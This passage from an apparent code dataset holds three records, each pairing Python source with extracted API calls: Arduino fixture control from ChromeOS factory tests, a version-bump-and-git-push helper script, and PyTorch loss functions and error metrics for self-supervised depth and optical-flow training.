session.console.info('state: %s (transient, probe still moving)', state)
time.sleep(1)
timeout -= 1
if timeout == 0:
break
msg = 'AssertState failed: actual state: "%s", expected_states: "%s".'
raise FixtureException(msg % (state, str(expected_states)))
def _AssertState(self, expected_states):
"""Confirms that the arduino is in the specified state.
It returns True if the actual state is in the expected states;
otherwise, it returns the actual state.
"""
if not isinstance(expected_states, list):
expected_states = [expected_states]
actual_state = self.QueryState()
return (actual_state in expected_states, actual_state)
def AssertState(self, expected_states):
result, _ = self._AssertState(expected_states)
if result is not True:
msg = 'AssertState failed: actual state: "%s", expected_states: "%s".'
raise FixtureException(msg % (result, str(expected_states)))
def DriveProbeDown(self):
"""Drives the probe to the 'down' position."""
try:
response = self.SendReceive(COMMAND.DOWN)
session.console.info('Send COMMAND.DOWN(%s). Receive state(%s).',
COMMAND.DOWN, response)
except Exception:
raise FixtureException('DriveProbeDown failed.')
self.AssertState(STATE.STOP_DOWN)
def DriveProbeUp(self):
"""Drives the probe to the 'up' position."""
try:
response = self.SendReceive(COMMAND.UP)
session.console.info('Send COMMAND.UP(%s). Receive state(%s).',
COMMAND.UP, response)
except Exception:
raise FixtureException('DriveProbeUp failed.')
self.AssertState(STATE.STOP_UP)
|
[
"cros.factory.test.event.Event",
"cros.factory.test.i18n._",
"cros.factory.test.session.console.warn",
"time.sleep",
"cros.factory.test.session.console.info",
"threading.Event",
"collections.namedtuple",
"cros.factory.test.utils.serial_utils.FindTtyByDriver"
] |
[((843, 917), 'collections.namedtuple', 'collections.namedtuple', (['"""ArduinoCommand"""', "['DOWN', 'UP', 'STATE', 'RESET']"], {}), "('ArduinoCommand', ['DOWN', 'UP', 'STATE', 'RESET'])\n", (865, 917), False, 'import collections\n'), ((984, 1104), 'collections.namedtuple', 'collections.namedtuple', (['"""ArduinoState"""', "['INIT', 'STOP_DOWN', 'STOP_UP', 'GOING_DOWN', 'GOING_UP', 'EMERGENCY_STOP']"], {}), "('ArduinoState', ['INIT', 'STOP_DOWN', 'STOP_UP',\n 'GOING_DOWN', 'GOING_UP', 'EMERGENCY_STOP'])\n", (1006, 1104), False, 'import collections\n'), ((2291, 2357), 'cros.factory.test.utils.serial_utils.FindTtyByDriver', 'serial_utils.FindTtyByDriver', (['self.driver', 'self.interface_protocol'], {}), '(self.driver, self.interface_protocol)\n', (2319, 2357), False, 'from cros.factory.test.utils import serial_utils\n'), ((5143, 5160), 'threading.Event', 'threading.Event', ([], {}), '()\n', (5158, 5160), False, 'import threading\n'), ((5626, 5670), 'cros.factory.test.session.console.info', 'session.console.info', (['"""Drive Probe Down...."""'], {}), "('Drive Probe Down....')\n", (5646, 5670), False, 'from cros.factory.test import session\n'), ((5796, 5838), 'cros.factory.test.session.console.info', 'session.console.info', (['"""Drive Probe Up...."""'], {}), "('Drive Probe Up....')\n", (5816, 5838), False, 'from cros.factory.test import session\n'), ((2531, 2562), 'cros.factory.test.session.console.info', 'session.console.info', (['msg', 'port'], {}), '(msg, port)\n', (2551, 2562), False, 'from cros.factory.test import session\n'), ((2947, 3007), 'cros.factory.test.session.console.info', 'session.console.info', (['"""Reconnect to new port: %s"""', 'curr_port'], {}), "('Reconnect to new port: %s', curr_port)\n", (2967, 3007), False, 'from cros.factory.test import session\n'), ((5689, 5714), 'cros.factory.test.i18n._', '_', (['"""Pull the lever down."""'], {}), "('Pull the lever down.')\n", (5690, 5714), False, 'from cros.factory.test.i18n import _\n'), ((5857, 
5880), 'cros.factory.test.i18n._', '_', (['"""Pull the lever up."""'], {}), "('Pull the lever up.')\n", (5858, 5880), False, 'from cros.factory.test.i18n import _\n'), ((5955, 6020), 'cros.factory.test.event.Event', 'event.Event', (['event.Event.Type.TEST_UI_EVENT'], {'subtype': '"""FinishTest"""'}), "(event.Event.Type.TEST_UI_EVENT, subtype='FinishTest')\n", (5966, 6020), False, 'from cros.factory.test import event\n'), ((6497, 6553), 'cros.factory.test.utils.serial_utils.FindTtyByDriver', 'serial_utils.FindTtyByDriver', (['driver', 'interface_protocol'], {}), '(driver, interface_protocol)\n', (6525, 6553), False, 'from cros.factory.test.utils import serial_utils\n'), ((6676, 6707), 'cros.factory.test.session.console.info', 'session.console.info', (['msg', 'port'], {}), '(msg, port)\n', (6696, 6707), False, 'from cros.factory.test import session\n'), ((6714, 6800), 'cros.factory.test.session.console.info', 'session.console.info', (['"""Wait up to %d seconds for arduino initialization."""', 'timeout'], {}), "('Wait up to %d seconds for arduino initialization.',\n timeout)\n", (6734, 6800), False, 'from cros.factory.test import session\n'), ((8051, 8123), 'cros.factory.test.session.console.info', 'session.console.info', (['"""state: %s (transient, probe still moving)"""', 'state'], {}), "('state: %s (transient, probe still moving)', state)\n", (8071, 8123), False, 'from cros.factory.test import session\n'), ((8130, 8143), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (8140, 8143), False, 'import time\n'), ((9156, 9250), 'cros.factory.test.session.console.info', 'session.console.info', (['"""Send COMMAND.DOWN(%s). Receive state(%s)."""', 'COMMAND.DOWN', 'response'], {}), "('Send COMMAND.DOWN(%s). Receive state(%s).', COMMAND.\n DOWN, response)\n", (9176, 9250), False, 'from cros.factory.test import session\n'), ((9526, 9615), 'cros.factory.test.session.console.info', 'session.console.info', (['"""Send COMMAND.UP(%s). 
Receive state(%s)."""', 'COMMAND.UP', 'response'], {}), "('Send COMMAND.UP(%s). Receive state(%s).', COMMAND.UP,\n response)\n", (9546, 9615), False, 'from cros.factory.test import session\n'), ((2664, 2695), 'cros.factory.test.session.console.warn', 'session.console.warn', (['msg', 'port'], {}), '(msg, port)\n', (2684, 2695), False, 'from cros.factory.test import session\n'), ((7978, 8029), 'cros.factory.test.session.console.info', 'session.console.info', (['"""state: %s (expected)"""', 'state'], {}), "('state: %s (expected)', state)\n", (7998, 8029), False, 'from cros.factory.test import session\n')]
|
#!/usr/bin/env python3
import subprocess
import argparse
def increment_setup_version():
filename = 'setup.py'
# Read file
fd = open(filename, 'r')
line_arr = fd.readlines()
fd.close()
# Search for the specific line
count = 0
version = None
version_line = None
for i in range(0, len(line_arr)):
line = line_arr[i]
count += 1
# print("line{}: {}".format(count, line))
pattern0 = "version=\"0.0."
pattern1 = "\","
if pattern0 in line:
print("[find_version] line {}: {}".format(count, line))
version = line
version = version.strip()
version = version.replace(pattern0, "")
version = version.replace(pattern1, "")
version = int(version)
version_line = i
print("[find_version] version {}".format(version))
print("[find_version] version_line {}".format(version_line))
# Modify specific line
orig_line = line_arr[version_line]
new_line = orig_line.replace(str(version), str(version + 1))
line_arr[version_line] = new_line
# Write everythin again
with open(filename, 'w') as file:
file.writelines(line_arr)
def test_subprocess():
cmd = ['python', '--`version']
# result = subprocess.run(cmd, stdout=subprocess.PIPE)
# result = subprocess.run(cmd, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
result = subprocess.run(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
# result = subprocess.run(cmd, capture_output=True)
# print('cmd %s result %s' % (cmd, result))
print('result.stdout %s' % result.stdout)
# cmd = 'ls /usr/bin/python'
def check_python3_version():
for i in range(9, 6, -1):
pver = 'python3.%s' % i
cmd = [pver, '--version']
try:
result = subprocess.run(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
# print('result.stdout %s' % result.stdout)
_ = result
return pver
except FileNotFoundError:
result = 'FileNotFoundError'
# print('cmd %s result %s' % (cmd, result))
_ = result
return 'No python 3.x found'
def exec_cmd_and_report(cmd_str, decode):
result = subprocess.run(
cmd_str, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
print('cmd %s' % cmd_str)
print('result.stdout %s' % result.stdout)
if decode:
bstr = result.stdout
result_str = bstr.decode()
print('result_str')
print(result_str)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Operations related to Python venv')
parser.add_argument('--pver', action='store_true',
help='Get highest python3 version')
parser.add_argument('--iacp', action='store_true',
help='Increment version, '
'add any changes, commit and push to repo')
args = parser.parse_args()
if args.pver:
upver = check_python3_version()
print(upver)
if args.iacp:
increment_setup_version()
exec_cmd_and_report(['git', 'status'], decode=True)
exec_cmd_and_report(['git', 'add', '.'], decode=True)
exec_cmd_and_report(['git', 'commit', '-m',
'\"automated commit using iacp\"'], decode=True)
exec_cmd_and_report(['git', 'push'], decode=True)
exec_cmd_and_report(['git', 'status'], decode=True)
|
[
"subprocess.run",
"argparse.ArgumentParser"
] |
[((1479, 1548), 'subprocess.run', 'subprocess.run', (['cmd'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), '(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n', (1493, 1548), False, 'import subprocess\n'), ((2374, 2447), 'subprocess.run', 'subprocess.run', (['cmd_str'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), '(cmd_str, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n', (2388, 2447), False, 'import subprocess\n'), ((2708, 2780), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Operations related to Python venv"""'}), "(description='Operations related to Python venv')\n", (2731, 2780), False, 'import argparse\n'), ((1921, 1990), 'subprocess.run', 'subprocess.run', (['cmd'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), '(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n', (1935, 1990), False, 'import subprocess\n')]
|
# Author: <NAME>
# Copyright (c) 2019, <NAME>
# All rights reserved.
# based on github.com/ClementPinard/SfMLearner-Pytorch
import torch
from torch import nn
from torch.autograd import Variable
from inverse_warp import inverse_warp, flow_warp
from ssim import ssim
from process_functions import depth_occlusion_masks,occlusion_masks
from utils import robust_l1,logical_or,weighted_binary_cross_entropy
from utils import tensor2array
import matplotlib.pyplot as plt
#loss1 E_R recunstruction loss
def photometric_reconstruction_loss(tgt_img, ref_imgs, intrinsics, intrinsics_inv, depth, explainability_mask, pose, rotation_mode='euler', padding_mode='zeros', lambda_oob=0, qch=0.5, wssim=0.5):
def one_scale(depth, explainability_mask, occ_masks):
assert(explainability_mask is None or depth.size()[2:] == explainability_mask.size()[2:])
assert(pose.size(1) == len(ref_imgs))
reconstruction_loss = 0
b, _, h, w = depth.size()
downscale = tgt_img.size(2)/h
tgt_img_scaled = nn.functional.adaptive_avg_pool2d(tgt_img, (h, w))
ref_imgs_scaled = [nn.functional.adaptive_avg_pool2d(ref_img, (h, w)) for ref_img in ref_imgs]
intrinsics_scaled = torch.cat((intrinsics[:, 0:2]/downscale, intrinsics[:, 2:]), dim=1)
intrinsics_scaled_inv = torch.cat((intrinsics_inv[:, :, 0:2]*downscale, intrinsics_inv[:, :, 2:]), dim=2)
weight = 1.
#
for i, ref_img in enumerate(ref_imgs_scaled):#ref_imgs_scaled: list with 4 items( ref dimention)
current_pose = pose[:, i]
ref_img_warped = inverse_warp(ref_img, depth[:,0], current_pose, intrinsics_scaled, intrinsics_scaled_inv, rotation_mode, padding_mode)
valid_pixels = 1 - (ref_img_warped == 0).prod(1, keepdim=True).type_as(ref_img_warped)#[4,1,h,w]
diff = (tgt_img_scaled - ref_img_warped) * valid_pixels#[4,3,h,w]
ssim_loss = 1 - ssim(tgt_img_scaled, ref_img_warped) * valid_pixels#ssim(a,b)返回同样shape的c,按元素,越相似越接近1, 否则最低为0
oob_normalization_const = valid_pixels.nelement()/valid_pixels.sum()#avg, 根据monodepth改成min??
assert((oob_normalization_const == oob_normalization_const).item() == 1)
if explainability_mask is not None:
diff = diff * (1 - occ_masks[:,i:i+1])* explainability_mask[:,i:i+1].expand_as(diff)
ssim_loss = ssim_loss * (1 - occ_masks[:,i:i+1])* explainability_mask[:,i:i+1].expand_as(ssim_loss)
else:
diff = diff *(1-occ_masks[:,i:i+1]).expand_as(diff)
ssim_loss = ssim_loss*(1-occ_masks[:,i:i+1]).expand_as(ssim_loss)
reconstruction_loss += (1- wssim)*weight*oob_normalization_const*(robust_l1(diff, q=qch) + wssim*ssim_loss.mean()) + lambda_oob*robust_l1(1 - valid_pixels, q=qch)
assert((reconstruction_loss == reconstruction_loss).item() == 1)
#weight /= 2.83
return reconstruction_loss
if type(explainability_mask) not in [tuple, list]:
explainability_mask = [explainability_mask]
if type(depth) not in [list, tuple]:
depth = [depth]
loss = 0
for d, mask in zip(depth, explainability_mask):
occ_masks = depth_occlusion_masks(d, pose, intrinsics, intrinsics_inv)
loss += one_scale(d, mask, occ_masks)
return loss
def photometric_reconstruction_loss_robust(tgt_img, ref_imgs, intrinsics, intrinsics_inv, depth, explainability_mask, pose, rotation_mode='euler', padding_mode='zeros', lambda_oob=0, qch=0.5, wssim=0.5):
def one_scale(depth, explainability_mask, occ_masks):
assert(explainability_mask is None or depth.size()[2:] == explainability_mask.size()[2:])
assert(pose.size(1) == len(ref_imgs))
reconstruction_loss = 0
b, _, h, w = depth.size()
downscale = tgt_img.size(2)/h
tgt_img_scaled = nn.functional.adaptive_avg_pool2d(tgt_img, (h, w))
ref_imgs_scaled = [nn.functional.adaptive_avg_pool2d(ref_img, (h, w)) for ref_img in ref_imgs]
intrinsics_scaled = torch.cat((intrinsics[:, 0:2]/downscale, intrinsics[:, 2:]), dim=1)
intrinsics_scaled_inv = torch.cat((intrinsics_inv[:, :, 0:2]*downscale, intrinsics_inv[:, :, 2:]), dim=2)
weight = 1.
for i, ref_img in enumerate(ref_imgs_scaled):
current_pose = pose[:, i]
ref_img_warped = inverse_warp(ref_img, depth[:,0], current_pose, intrinsics_scaled, intrinsics_scaled_inv, rotation_mode, padding_mode)
valid_pixels = 1 - (ref_img_warped == 0).prod(1, keepdim=True).type_as(ref_img_warped)
diff = (tgt_img_scaled - ref_img_warped) * valid_pixels
ssim_loss = 1 - ssim(tgt_img_scaled, ref_img_warped) * valid_pixels#ssim(a,b)返回同样shape的c,按元素,越相似越接近1, 否则最低为0
oob_normalization_const = valid_pixels.nelement()/valid_pixels.sum()
assert((oob_normalization_const == oob_normalization_const).item() == 1)
if explainability_mask is not None:
diff = diff * (1 - occ_masks[:,i:i+1])* explainability_mask[:,i:i+1].expand_as(diff)
ssim_loss = ssim_loss * (1 - occ_masks[:,i:i+1])* explainability_mask[:,i:i+1].expand_as(ssim_loss)
else:
diff = diff *(1-occ_masks[:,i:i+1]).expand_as(diff)
ssim_loss = ssim_loss*(1-occ_masks[:,i:i+1]).expand_as(ssim_loss)
reconstruction_loss += (1- wssim)*weight*oob_normalization_const*(robust_l1(diff, q=qch) + wssim*ssim_loss.mean()) + lambda_oob*robust_l1(1 - valid_pixels, q=qch)
assert((reconstruction_loss == reconstruction_loss).item() == 1)
#weight /= 2.83
return reconstruction_loss
if type(explainability_mask) not in [tuple, list]:
explainability_mask = [explainability_mask]
if type(depth) not in [list, tuple]:
depth = [depth]
loss = 0
for d, mask in zip(depth, explainability_mask):
occ_masks = depth_occlusion_masks(d, pose, intrinsics, intrinsics_inv)
loss += one_scale(d, mask, occ_masks)
return loss
#loss2 E_M
def explainability_loss(mask):
    """Explainability regularization loss (E_M).

    Binary cross-entropy of each mask against an all-ones target. This
    pushes mask values toward 1, i.e. it penalizes marking pixels as
    unexplainable (the original comment claiming "larger mask, larger
    loss" had the direction inverted).

    :param mask: a mask tensor, or a tuple/list of mask tensors (one per scale)
    :return: scalar loss summed over all scales
    """
    if type(mask) not in [tuple, list]:
        mask = [mask]
    loss = 0
    for mask_scaled in mask:
        # All-ones target with the same shape/dtype/device as the mask.
        ones_var = torch.ones_like(mask_scaled)
        loss += nn.functional.binary_cross_entropy(mask_scaled, ones_var)
    return loss
#loss_3 E_S smooth loss
def smooth_loss(pred_disp):
    """Second-order smoothness loss (E_S).

    Penalizes the mean absolute second derivatives (dxx, dxy, dyx, dyy) of
    each predicted disparity map; coarser scales are down-weighted by 2.3
    (~2*sqrt(2)) per level.

    :param pred_disp: a disparity tensor [B, C, H, W], or a tuple/list of
        them (one per scale)
    :return: scalar loss summed over all scales
    """
    def finite_diff(t):
        # First-order differences along width (dim 3) and height (dim 2).
        d_y = t[:, :, 1:] - t[:, :, :-1]
        d_x = t[:, :, :, 1:] - t[:, :, :, :-1]
        return d_x, d_y

    if type(pred_disp) not in (tuple, list):
        pred_disp = [pred_disp]

    total = 0
    scale_weight = 1.
    for disp in pred_disp:
        grad_x, grad_y = finite_diff(disp)
        d2x, dxdy = finite_diff(grad_x)
        dydx, d2y = finite_diff(grad_y)
        curvature = d2x.abs().mean() + dxdy.abs().mean() + dydx.abs().mean() + d2y.abs().mean()
        total += curvature * scale_weight
        scale_weight /= 2.3  # ~2*sqrt(2)
    return total
#loss4 E_f, flow_loss
def photometric_flow_loss(tgt_img, ref_imgs, flows, explainability_mask, lambda_oob=0, qch=0.5, wssim=0.5):
    """Photometric flow loss (E_F).

    Warps each reference image back to the target view with the predicted
    optical flow and penalizes the photometric difference (robust L1 mixed
    with SSIM), optionally weighted by an explainability mask and
    down-weighted in occluded regions.

    :param tgt_img: target image [B, 3, H, W]
    :param ref_imgs: list of reference images, one per flow
    :param flows: [flow_fwd, flow_bwd]; each entry is either a single flow
        tensor or a per-scale list of tensors (e.g. [B, 2, 128, 512] down
        to [B, 2, 4, 16])
    :param explainability_mask: per-scale mask tensors (e.g. [B, 2, 128, 512])
        or None to disable mask weighting
    :param lambda_oob: weight of the out-of-bounds regularizer
    :param qch: exponent of the robust (Charbonnier-style) L1 penalty
    :param wssim: mixing weight between L1 and SSIM terms
    :return: scalar loss summed over all scales
    """
    def one_scale(explainability_mask, occ_masks, flows):
        assert(explainability_mask is None or flows[0].size()[2:] == explainability_mask.size()[2:])
        assert(len(flows) == len(ref_imgs))
        reconstruction_loss = 0
        b, _, h, w = flows[0].size()
        downscale = tgt_img.size(2)/h
        tgt_img_scaled = nn.functional.adaptive_avg_pool2d(tgt_img, (h, w))
        ref_imgs_scaled = [nn.functional.adaptive_avg_pool2d(ref_img, (h, w)) for ref_img in ref_imgs]
        weight = 1.
        for i, ref_img in enumerate(ref_imgs_scaled):
            current_flow = flows[i]
            # Warp the reference image into the target view (w_c term).
            ref_img_warped = flow_warp(ref_img, current_flow)
            # Pixels that warp from outside the image come back as exact zeros.
            valid_pixels = 1 - (ref_img_warped == 0).prod(1, keepdim=True).type_as(ref_img_warped)
            diff = (tgt_img_scaled - ref_img_warped) * valid_pixels
            ssim_loss = 1 - ssim(tgt_img_scaled, ref_img_warped) * valid_pixels
            # Renormalize so the mean is effectively taken over in-bounds pixels only.
            oob_normalization_const = valid_pixels.nelement()/valid_pixels.sum()
            if explainability_mask is not None:
                diff = diff * explainability_mask[:,i:i+1].expand_as(diff)
                ssim_loss = ssim_loss * explainability_mask[:,i:i+1].expand_as(ssim_loss)
            if occ_masks is not None:
                diff = diff *(1-occ_masks[:,i:i+1]).expand_as(diff)
                ssim_loss = ssim_loss*(1-occ_masks[:,i:i+1]).expand_as(ssim_loss)
            reconstruction_loss += (1- wssim)*weight*oob_normalization_const*(robust_l1(diff, q=qch) + wssim*ssim_loss.mean()) + lambda_oob*robust_l1(1 - valid_pixels, q=qch)
            #weight /= 2.83
        # NaN guard: a NaN never compares equal to itself.
        assert((reconstruction_loss == reconstruction_loss).item() == 1)
        return reconstruction_loss
    if type(flows[0]) not in [tuple, list]:  # single-scale input: wrap into per-scale lists
        if explainability_mask is not None:
            explainability_mask = [explainability_mask]
        flows = [[uv] for uv in flows]
    loss = 0
    for i in range(len(flows[0])):  # iterate over scales
        # flow_at_scale: list(2) of tensors [B, 2, H/2^i, W/2^i] (fwd, bwd)
        flow_at_scale = [uv[i] for uv in flows]
        occ_mask_at_scale_bw, occ_mask_at_scale_fw = occlusion_masks(flow_at_scale[0], flow_at_scale[1])  # 0: fwd; 1: bwd
        # occ_mask_at_scale_bw has shape [B, H, W]
        occ_mask_at_scale = torch.stack((occ_mask_at_scale_bw, occ_mask_at_scale_fw), dim=1)
        # Bug fix: indexing a None explainability_mask raised TypeError for
        # multi-scale flows; one_scale already supports None, so forward it.
        mask_at_scale = None if explainability_mask is None else explainability_mask[i]
        loss += one_scale(mask_at_scale, occ_mask_at_scale, flow_at_scale)
    return loss
#loss_5 E_C 修改过one_scale loss func
def consensus_depth_flow_mask(explainability_mask, census_mask_bwd, census_mask_fwd, exp_masks_bwd_target, exp_masks_fwd_target, THRESH, wbce):
    """Consensus loss (E_C) between depth and flow rigidity estimates.

    Builds a binary "rigid" target from thresholded census masks, OR-ed with
    the explainability-mask targets, and supervises the explainability mask
    with a weighted binary cross-entropy at every scale.

    :param explainability_mask: mask tensor, or per-scale list of tensors
    :param census_mask_bwd: backward census masks (tensor or per-scale list)
    :param census_mask_fwd: forward census masks (tensor or per-scale list)
    :param exp_masks_bwd_target: backward explainability targets
    :param exp_masks_fwd_target: forward explainability targets
    :param THRESH: rigidity threshold applied to the census masks
    :param wbce: positive-class weight of the weighted BCE
    :return: scalar loss summed over all scales
    """
    def single_scale(exp_mask, census_bwd, census_fwd, target_bwd, target_fwd, thresh, w):
        # Binarize: a pixel counts as rigid when every channel is below thresh.
        rigid_fwd = (census_fwd < thresh).type_as(exp_mask).prod(dim=1, keepdim=True)
        rigid_bwd = (census_bwd < thresh).type_as(exp_mask).prod(dim=1, keepdim=True)
        # Pixelwise consensus: union with the explainability targets.
        rigid_fwd = logical_or(rigid_fwd, target_fwd)
        rigid_bwd = logical_or(rigid_bwd, target_bwd)
        # Detach so no gradient flows through the constructed targets.
        rigid_fwd = Variable(rigid_fwd.data, requires_grad=False)
        rigid_bwd = Variable(rigid_bwd.data, requires_grad=False)
        # Channel layout matches the 4-channel explainability mask: bwd, bwd, fwd, fwd.
        combined = torch.cat((rigid_bwd, rigid_bwd, rigid_fwd, rigid_fwd), dim=1)
        return weighted_binary_cross_entropy(exp_mask, combined.type_as(exp_mask), [w, 1 - w])

    assert (len(explainability_mask) == len(census_mask_bwd))
    assert (len(explainability_mask) == len(census_mask_fwd))
    if type(explainability_mask) not in (tuple, list):
        return single_scale(explainability_mask, census_mask_bwd, census_mask_fwd,
                            exp_masks_bwd_target, exp_masks_fwd_target, THRESH, wbce)
    loss = 0.
    for scale in range(len(explainability_mask)):
        loss += single_scale(explainability_mask[scale], census_mask_bwd[scale],
                             census_mask_fwd[scale], exp_masks_bwd_target[scale],
                             exp_masks_fwd_target[scale], THRESH, wbce)
    return loss
#note use
def gaussian_explainability_loss(mask):
    """Gaussian prior on the explainability mask (currently unused).

    Each scale contributes exp(-mean((mask - 0.5)^2) / 0.15): the loss is
    maximal (1 per scale) when the mask sits at 0.5 everywhere and decays
    as values move toward 0 or 1.

    :param mask: mask tensor, or tuple/list of mask tensors (one per scale)
    :return: scalar loss summed over all scales
    """
    if type(mask) not in (tuple, list):
        mask = [mask]
    total = 0
    for scaled in mask:
        spread = torch.mean((scaled - 0.5).pow(2))
        total += torch.exp(-spread / 0.15)
    return total
def edge_aware_smoothness_loss(img, pred_disp):
    """Edge-aware first-order smoothness loss.

    Penalizes disparity gradients, down-weighted by exp(-|image gradient|)
    so that depth discontinuities are tolerated at image edges.

    :param img: reference image tensor [B, C, H, W]
    :param pred_disp: iterable of predicted disparity maps [B, 1, h, w],
        one per scale (the image is average-pooled to each scale)
    :return: scalar loss summed over all scales
    """
    def gradient_x(t):
        # Finite difference along height (dim 2).
        return t[:, :, :-1, :] - t[:, :, 1:, :]

    def gradient_y(t):
        # Finite difference along width (dim 3).
        return t[:, :, :, :-1] - t[:, :, :, 1:]

    def get_edge_smoothness(image, pred):
        pred_gx = gradient_x(pred)
        pred_gy = gradient_y(pred)
        img_gx = gradient_x(image)
        img_gy = gradient_y(image)
        # exp(-|grad I|), averaged over channels: ~0 at strong edges, 1 in flat areas.
        weights_x = torch.exp(-torch.mean(torch.abs(img_gx), 1, keepdim=True))
        weights_y = torch.exp(-torch.mean(torch.abs(img_gy), 1, keepdim=True))
        smoothness_x = torch.abs(pred_gx) * weights_x
        smoothness_y = torch.abs(pred_gy) * weights_y
        return torch.mean(smoothness_x) + torch.mean(smoothness_y)

    loss = 0
    # NOTE(review): unlike smooth_loss, scales are NOT down-weighted here. The
    # original computed a per-scale `weight` (divided by 2.3 each iteration)
    # but never applied it to the loss, so the dead variable has been removed;
    # confirm equal per-scale weighting is the intended behavior.
    for scaled_disp in pred_disp:
        b, _, h, w = scaled_disp.size()
        scaled_img = nn.functional.adaptive_avg_pool2d(img, (h, w))
        loss += get_edge_smoothness(scaled_img, scaled_disp)
    return loss
class MaskedMSELoss(nn.Module):
    """Mean-squared-error loss restricted to pixels where the target is > 0."""

    def __init__(self):
        super(MaskedMSELoss, self).__init__()

    def forward(self, pred, target):
        """Return the MSE over valid (target > 0) elements.

        :param pred: prediction tensor, same rank as ``target``
        :param target: ground-truth tensor; zeros/negatives are treated as invalid
        """
        assert pred.dim() == target.dim(), "inconsistent dimensions"
        valid_mask = (target > 0).detach()
        residual = (target - pred)[valid_mask]
        self.loss = residual.pow(2).mean()
        return self.loss
class MaskedL1Loss(nn.Module):
    """L1 loss restricted to pixels where the target is > 0.

    Accepts either single tensors or per-scale lists for both arguments.
    """

    def __init__(self):
        super(MaskedL1Loss, self).__init__()

    def forward(self, target, pred):
        """Return the mean absolute error over valid (target > 0) elements,
        summed across scales.

        :param target: ground-truth tensor, or list/tuple of per-scale tensors
        :param pred: prediction tensor, or list/tuple of per-scale tensors
        """
        if type(pred) not in [tuple, list]:
            pred = [pred]
        # Bug fix: previously only `pred` was wrapped, so zipping a bare
        # tensor `target` against the one-element list paired the prediction
        # with target[0] (the target's first slice) instead of the whole tensor.
        if type(target) not in [tuple, list]:
            target = [target]
        loss = 0
        for scaled_pred, scaled_target in zip(pred, target):
            valid_mask = (scaled_target > 0).detach()
            diff = (scaled_target - scaled_pred)[valid_mask]
            loss += diff.abs().mean()
        return loss
class HistgramLoss(nn.Module):
    """L1 distance between the normalized 256-bin intensity histograms of
    prediction and target (over [0, 1]), scaled by 100.

    Both inputs are detached, so this loss carries no gradient.
    """

    def __init__(self):
        super(HistgramLoss, self).__init__()

    def forward(self, pred, target):
        """Return 100 * mean(|hist(target) - hist(pred)|)."""
        assert pred.dim() == target.dim(), "inconsistent dimensions"
        numel = pred.numel()
        pred = pred.detach()
        target = target.detach()
        # Histograms normalized by the element count so they are distributions.
        hist_gt = torch.histc(target.flatten(), bins=256, min=0, max=1).float() / numel
        hist_pred = torch.histc(pred.flatten(), bins=256, min=0, max=1).float() / numel
        self.loss = (hist_gt - hist_pred).abs().mean()
        return self.loss * 100
class ComputeErrors(nn.Module):
    """Standard depth-evaluation metrics, averaged over the batch.

    Returns [abs_diff, abs_rel, sq_rel, a1, a2, a3] where a_k is the
    fraction of pixels with max(gt/pred, pred/gt) < 1.25**k.
    """

    def __init__(self):
        super(ComputeErrors, self).__init__()

    def forward(self, gt, pred, crop):
        """Compute the metrics for a batch of depth maps.

        NOTE(review): both ``gt`` and ``pred`` are rescaled in place by 255
        (assumed to arrive normalized to [0, 1]); callers should not reuse
        the originals afterwards — confirm this is intended.

        :param gt: ground-truth depth [B, H, W]
        :param pred: predicted depth [B, H, W]
        :param crop: apply the Garg ECCV16 crop (reproduces Eigen NIPS14)
        """
        gt *= 255
        pred *= 255
        batch_size = gt.size(0)
        abs_diff = abs_rel = sq_rel = a1 = a2 = a3 = 0
        if crop:
            # Start from an all-False mask the size of one sample, then
            # enable only the interior crop region.
            crop_mask = gt[0] != gt[0]
            top, bottom = int(0.40810811 * gt.size(1)), int(0.99189189 * gt.size(1))
            left, right = int(0.03594771 * gt.size(2)), int(0.96405229 * gt.size(2))
            crop_mask[top:bottom, left:right] = 1
        for sample_gt, sample_pred in zip(gt, pred):
            valid = (sample_gt > 0) & (sample_gt < 255)
            if crop:
                valid = valid & crop_mask
            valid_gt = sample_gt[valid]
            valid_pred = sample_pred[valid].clamp(1e-3, 255)
            # Median scaling: align the prediction's scale with the ground truth.
            valid_pred = valid_pred * torch.median(valid_gt) / torch.median(valid_pred)
            ratio = torch.max(valid_gt / valid_pred, valid_pred / valid_gt)
            a1 += (ratio < 1.25).float().mean()
            a2 += (ratio < 1.25 ** 2).float().mean()
            a3 += (ratio < 1.25 ** 3).float().mean()
            residual = valid_gt - valid_pred
            abs_diff += torch.mean(torch.abs(residual))
            abs_rel += torch.mean(torch.abs(residual) / valid_gt)
            sq_rel += torch.mean(residual ** 2 / valid_gt)
        return [metric / batch_size for metric in [abs_diff, abs_rel, sq_rel, a1, a2, a3]]
def compute_errors2(gt, pred, crop=False):
    """Depth-evaluation metrics with an 80-unit depth cap.

    Returns batch-mean [abs_diff, abs_rel (%), sq_rel (%), a1, a2, a3, epe],
    where a_k is the fraction of pixels with max(gt/pred, pred/gt) < 1.25**k
    and epe is the mean squared error on valid pixels.

    :param gt: ground-truth depth [B, H, W]; values outside (0, 80) are ignored
    :param pred: predicted depth [B, H, W]
    :param crop: apply the Garg ECCV16 crop (reproduces Eigen NIPS14)
    """
    batch_size = gt.size(0)
    abs_diff = abs_rel = sq_rel = a1 = a2 = a3 = epe = 0
    if crop:
        # All-False mask the size of one sample; True inside the crop window.
        crop_mask = gt[0] != gt[0]
        y1, y2 = int(0.40810811 * gt.size(1)), int(0.99189189 * gt.size(1))
        x1, x2 = int(0.03594771 * gt.size(2)), int(0.96405229 * gt.size(2))
        crop_mask[y1:y2, x1:x2] = 1
    for sample_gt, sample_pred in zip(gt, pred):
        valid = (sample_gt > 0) & (sample_gt < 80)
        if crop:
            valid = valid & crop_mask
        valid_gt = sample_gt[valid]
        valid_pred = sample_pred[valid].clamp(1e-3, 80)
        # Median scaling: align the prediction's scale with the ground truth.
        valid_pred = valid_pred * torch.median(valid_gt) / torch.median(valid_pred)
        ratio = torch.max(valid_gt / valid_pred, valid_pred / valid_gt)
